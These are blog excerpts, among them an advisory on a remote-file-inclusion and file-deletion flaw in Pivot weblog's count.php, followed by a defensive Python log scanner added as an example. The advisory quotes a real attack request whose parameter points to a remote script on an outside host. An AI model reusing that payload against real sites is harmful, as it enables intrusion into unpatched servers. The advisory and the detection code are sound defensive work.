Aaaaaaannnnd.... we're back!

After much deliberation I’ve finally gotten around to upgrading my website to the latest version of the software, and while I was at it I decided to change the default appearance to something a little less busy... which basically means that I played around with CSS until I happened across something that I like but which will probably cause everyone else to run screaming.

I know things are a little broken right now, I’m still sorting them out. I hope you like it.

The locations of the RSS and ATOM feeds have changed, so if you read this …


Remotely exploitable vulnerability found in Pivot v1.40.6!

Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP variable is set, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:

a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1 …

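A log check for the request pattern shown in the excerpt above, as an added example that is not part of the original post: it scans Apache access-log lines for requests to count.php in which a query parameter carries a URL. The sample log lines, client addresses and host names are constructed, and the function name is hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote

# Script path named in the advisory; matched after collapsing repeated slashes.
TARGET = "/extensions/bbclone_tools/count.php"
# A parameter value that is itself a URL is the remote-inclusion signature.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# Apache common/combined format: host ident user [time] "request" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET //extensions/bbclone_tools/'
    'count.php?refkey=http://files.example.invalid/a.txt?? HTTP/1.1" 404 321',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /extensions/bbclone_tools/'
    'count.php?refkey=http%3A%2F%2Ffiles.example.invalid%2Fa.txt HTTP/1.0" 200 12',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /extensions/bbclone_tools/'
    'count.php?refkey=abc123 HTTP/1.1" 200 40',
    '198.51.100.8 - - [01/Jan/2024:10:02:00 +0000] "GET /archive/2024/01/01/'
    'post?src=http://www.example.org/ HTTP/1.1" 200 5120',
]

def find_inclusion_attempts(lines):
    """Return (client, status, parameter) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, _when, request, status = m.groups()
        fields = request.split(" ")
        if len(fields) < 2:
            continue
        # Split by hand: urlsplit() would read a leading "//" as a hostname.
        path, _, query = fields[1].partition("?")
        path = re.sub(r"/+", "/", unquote(path)).lower()
        if not path.endswith(TARGET):
            continue
        # parse_qsl percent-decodes values, so encoded URLs are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append((client, int(status), name))
    return hits

if __name__ == "__main__":
    for client, status, name in find_inclusion_attempts(SAMPLE_LOG):
        print(f"{client} status={status} parameter={name}")
```

The status code in each hit tells you whether the script was actually reachable (200) or the request missed (404), which decides how urgently the host needs a closer look.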

An open question for my readers.

While going through my server logs tonight I keep seeing logfile entries like this:

a.b.c.d - - [13/Jan/2008:22:59:49 -0500] "GET /pivot/archive/2007/11/16/serious_vulnerability_found_in HTTP/1.0" 404 321 "http://drwho.virtadpt.net/archive/2007/11/16/serious_vulnerability_found_in" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"

Someone's going to articles on my website that exist, but then they're clicking a link someplace in the article that's sending them to the same URL prepended with the string /pivot, and I can't figure out where or why they're causing …
